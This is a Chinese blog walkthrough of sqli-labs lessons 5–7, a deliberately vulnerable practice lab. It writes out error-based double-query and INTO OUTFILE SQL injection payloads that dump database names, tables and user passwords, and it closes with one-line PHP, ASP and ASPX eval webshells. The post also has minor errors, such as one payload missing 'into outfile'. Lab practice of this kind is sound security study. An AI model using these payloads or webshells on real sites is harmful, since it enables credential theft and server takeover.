小白日记 1day sqli-labs-master/less 5~7

最新推荐文章于 2021-01-27 16:51:36 发布
最新推荐文章于 2021-01-27 16:51:36 发布
阅读量133 收藏
点赞数
分类专栏: 小白日记 小白 文章标签: SQL注入 sqli-labs-master
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40514070/article/details/100879111
版权

在开始本次实验之前要说到常用的几个函数,

concat(str,str):这个函数的功能是将字符串拼接在一起。
在这里插入图片描述

rand():rand函数的功能是生成一个0~1之间的数。如下图
在这里插入图片描述

floor(数字):这个函数就是向下取整的一个函数,[x],例如1.2进行运算后会变成1。
在这里插入图片描述

count:这个函数能够返回匹配指定条件的函数。
在这里插入图片描述

Less 5 GET-Doouble injection-Single Quotes -String

打开初始界面如下图所示
在这里插入图片描述
按照注入流程,判断是哪种类型的注入,字符型还是数字型,那么要怎么做呢?
首先,我们输入?id=1没有进行报错,再此输入?id=1’这是我们发现报错了,再试试双引号,同样没有报错,所以可以判断存储在?id=1这个注入点,并且是数字型注入。接下来就需要构造语句了。
这时我们按照之前的union select 判断有多少列,可以得到有三列,但是之后的查询语句发现并不能返回任何结果。
在这里插入图片描述
在使用之前的extractvalue报错函数发现并不能通过此种方法来返回有效的信息。
那么,到这里就不得不说另一种报错注入的方法了,也就是标题所提示的双注入,那么他的原理也比较简单,我们要想尽办法让它出错,这里就用到了,floorrand函数,这两个函数在开始已经介绍完毕了,用这种方法嵌套在一起,floor(rand()*2),这样的话它将会得到两个值,0或者1,接着利用group by函数的特性,group by key理论上key的值是不会发生变化的,但是floor(rand()*2)是存在两个值的,group by key会循环读表中的每一行,如果表中没有的话,那就把其插入这个临时表,但是插入的时候又要去访问key以确定key的值,这时就有可能发生错误,同时达成我们的目的。
那么了解了原理,那就要开始构造了。

url+?id=0' union select count(*),concat((select database()),floor(rand()*2)) as a from information_schema.tables group by a--+

挡把上边的语句输入后会发现报错,但这个报错是非常low的报错,不是我们需要的,这个就请读者自己改吧,很简单的,千万别当cv工程师,完了什么都不懂。
还有些时候,我们在输入构造的语句发现没有什么变化,这个是因为rand函数的随机性,多刷新几次就好了,成功的话会变成这样。
在这里插入图片描述
接着只需要在构造的语句中加入我们需要的查询语句就ok了。
就举个例子

url+?id=0' union select count(*),concat((select group_concat(table_name) from information_schema.tables where table_schema=database()),floor(rand()*2)) as a from information_schema.tables group by a --+

因为rand的随机特性所以要多试几次,根据我们的查询语句,我们可以得到这样的信息。
在这里插入图片描述
接下来爆列

url+?id=0' union select count(*),2,concat((select group_concat(column_name) from information_schema.columns where table_name='users'),floor(rand()*9)) as a from information_schema.tables group by a --+

看结果
在这里插入图片描述
最后一步了,爆值

url+?id=0' union select count(*),2,concat((select concat(':',username,':',password,':') from users limit 0,1),floor(rand()*9)) as a from information_schema.tables group by a --+

结果
在这里插入图片描述
通过更改limit 后的值就可以知道所有的值了

Less 6 GET-Double injection-Double Quotes -String

和上一题一样,这里就不演示了,就是换个引号的问题

Less 7 GET-Dump into outfile - String

通过测试,发现没有任何信息,但是可以获得一个提示信息。
在这里插入图片描述
这里构造之前需要做一个闭合,动手后发现需要两个括号。
outfile输出文件,查过相关的资料后发现,可以构造语句将数据库中的东西存储在文件中

url+?id=0')) union select 1,2,database() into outfile "C:\\wamp64\\tmp\\1.txt" lines terminated by '\r\n' --+

这样就可以搞到数据库名字了,但是这个路径是要和数据库中这个匹配的在这里插入图片描述
其他的也是一样的,就改改database()那里就好了。
在这里插入图片描述
获取表名:

url+?id=0')) union select 1,2,table_name from information_schema.tables where table_schema=database() "C:\\wamp64\\tmp\\2.txt" lines terminated by '\r\n' --+

在这里插入图片描述
获取列:

url+?id=0')) union select 1,2,column_name from information_schema.columns where table_name='users' into outfile "C:\\wamp64\\tmp\\3.txt" lines terminated by '\r\n' --+

在这里插入图片描述
最后获取信息:

url+?id=0')) union select id,username,password from users into outfile "C:\\wamp64\\tmp\\4.txt" lines terminated by '\r\n' --+

在这里插入图片描述
这道题其实应该用另一个方法,一句话木马。
php

<?php @eval($_POST['pass']);?>

asp

<%eval request ("pass")%>

aspx

<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>

后边有时间再搞一次吧

藤原拓海s
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs Less-5 (报错注入)
A9874564的博客
02-25 4213
在实际场景中,如果没有一个合适的数据返回点,而是仅仅带入Sql数据进行查询,就需要报错注入。 1.less 5 正常情况,我们构造闭合,发现没有问题 利用前几关的思路,发现无论怎么操作都是You are in......,这个时候一般的思路就行不通。 发现:仅带入Sql数据进行查询,没有一个合适的数据返回点,这时候可以尝试报错注入。 2.报错注入 2.1 extractvalue报错 示例: and extractvalue(null,concat(0x7e,(sql_inje.
sqli-labs-master【Less-5/6】
weixin_44352521的博客
12-14 258
Less-5 1. 首先判断闭合方式和字段: http://192.168.228.129/sqli-labs-master/Less-5/?id=1' --+ 闭合方式为单引号,字段数为3; 2. 查看显示位 http://192.168.228.129/sqli-labs-master/Less-5/?id=1' union select 1,1,1 --+ 可以看到,语句已经执行了,...
Sqli-labs--less-5
小人物的博客
05-21 649
less 5 GET - Double Injection - Single Quotes - String (双注入GET单引号字符型注入) 双查询注入顾名思义形式上是两个嵌套的查询,即select …(select …),里面的那个select被称为子查询,他的执行顺序也是先执行子查询,然后再执行外面的select,双注入主要涉及到了几个sql函数: rand()随机函数,返回0~1之间的...
[SQLi-LABS] Less-5
Stan冲冲冲
05-11 209
可以用报错注入,联合查询和双注入 报错: /Less-5/?id=1'--+ /Less-5/?id=1'and extractvalue(1, concat(0x7e, (select version()),0x7e))--+ /Less-5/?id=1'and extractvalue(1, concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database()),'
sqli-libs——less 5(盲注)
Fly_鹏程万里
05-08 1873
Less-5由于这一关涉及到盲注的内容,所以我们还是想来看看源代码吧:可以看到,如果运行返回结果正确的时候只返回you  are in...,不会返回数据库当中的信息了,所以我们不能之前所采用的在less-4之前的方法了。从这里开始就要进行盲注了!利用left(a,b)进行测试测试数据库版本利用left(database(),1)进行尝试http://192.168.11.136/sqli-lab...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
phpstudy+靶场sqli-labs-master下载
最新发布
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
Sqli-labs之Less-5的补充
→_→
03-30 672
原文链接:http://www.52bug.cn/hkjs/4649.html 这里我会对原文进行部分修改: 0x00 概述渗透的时候总会首先测试注入,sql注入可以说是web漏洞界的Boss了,稳居owasp第一位,普通的直接回显数据的注入现在几乎绝迹了,绝大多数都是盲注了,此文是盲注系列的第一篇,介绍盲注中的报错注入。 0×01 报错注入原理 其实报错注入有很多种,本文主要介绍几种...
sqli-labs-master-注入学习靶机
01-19
sqli-labs是一个非常好的学习sql注入的一个游戏教程,是一个印度程序猿的搬砖建造的,对于了解sqlmap的原理很有帮助。
sqli-labs ---- Less-5 & Less-6
Nixawk
05-31 2936
在过去的日子里,我们利用https://github.com/Audi-1/sqli-labs,讨论了SQL注入的不同类型。最新发布的内容见地址。 现在,我们将回顾之前的SQL注入内容,并讨论基于错误显示的二阶查询注入,有时候又称子查询注入。有些人喜欢称其为盲注,但是我喜欢称其为显错注入,因为接下来我们会通过错误来获取信息。接下来的内容会如第一部分那样,继续采用分类方案,接下来的内容会以
sqli-labs (less5-less6)
Xi4or0uji
07-25 487
写在前面 三个函数mid(),substr(),left() mid(string,start,length)  //得出字符串 sub(string,start,length)  //得出字符串 left(string,length)   //取左边 less 5 get方法单引号布尔盲注 这题跟前面最大的不同就是信息正确的话没有信息回显,只显示you are in......  ...
sqli-labs Less-5和Less-6
giun的博客
01-29 537
Less-5 首先我们观察下源码 观察源码可以看出,如果返回的结果正确就只能返回you are in…,不能得到我们要的数据,所以采用报错注入,这里我们采用floor报错 and (select 1 from (select count(*),concat((payload),floor (rand(0)*2))x from information_schema.tables group by ...
Sqli labs系列-less-5&6 报错注入法(上)
weixin_30315723的博客
08-28 78
在我一系列常规的测试后发现,第五关和第六关,是属于报错注入的关卡,两关的区别是一个是单引号一个是双引号。。。当然我是看了源码的。。。。 基于报错注入的方法,我早就忘的差不多了,,,我记的我最后一次基于报错注入是在玩网络攻防平台第几关来着得,那个关卡时基于报错注入的,我当时还特地查了好多资料,学习了学习报错注入,当然在那段时间时,我看到我一个认为不错的团队开始收核心成员了,我就发了一份申请,果不其...
sqli-labs注入——sqli-labs的1-65关闯关指南
qq_51366383的博客
01-27 1593
sqli-labs图片上一共有75关,但是下载的资料都只有65关,所以只写了65关,本文仅是个人想法,如有不对请多谅解。 前面三部分的数据为:security 1、Emails Id ,email_id 2、referers 3、Uagents id,uagent,ip_address,username 4、Users id,username,password password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,
sqli-labs-master-Less-5 基于聚合分组函数报错的双注入(盲注手注)还有一种基于溢出的报错双注入要整理...
weixin_30709929的博客
10-30 89
先从老套路开始—— ?id=1无报错,?id=1'发现有报错!根据返回的语法错误可以判断是字符型 再然后可以判断出列数:?id=1' order by 3%23 然后按照套路,下一步应该是联合查询,可惜没有回显,这条路到这儿已经走到头了。 但是!但是!我们可以看看我们还有什么:1、语法错误仍然会显示出来2、You are in...的存在与否仍然可以帮助我们判断查询是否有...
SQL注入之手工注入sqli-labs-master
龙乐的专栏
08-22 3907
sql注入就是用户在Web页面中输入的指令内容可以在数据库中执行。这里我通过sqli-labs-master来演示下手工sql注入。 首先是搭建环境,我用的是WampServer
Sqli-Labs之less-5(双注入解法)
ISNS的博客
02-08 2067
说在开头:文章是我通过查询资料后按照自己的理解总结出来的,所以如果有说法不对的地方,欢迎大佬指正~ 这一关花费了我大量的时间,我在网上看了很多别人的解题思路,发现基本上使用的都是盲注,网上用的比较多的就是布尔型盲注和时间延迟型盲注。 我没有花时间去学习什么是盲注,通过看网上的解题思路,我的理解就是,在没有可显字段的情况下,通过输入查询语句一个一个猜测、通过看页面回显来判断自己的猜测是否正确(如...
sqli-labs-master/Less-17
07-28
Less-17 是一个 SQL 注入实验,它位于 sqli-labs-master 实验室的目录中。在这个实验中,你可以学习和实践 SQL 注入攻击的技术。 SQL 注入是一种常见的网络安全漏洞,它允许攻击者通过在应用程序的输入字段中注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值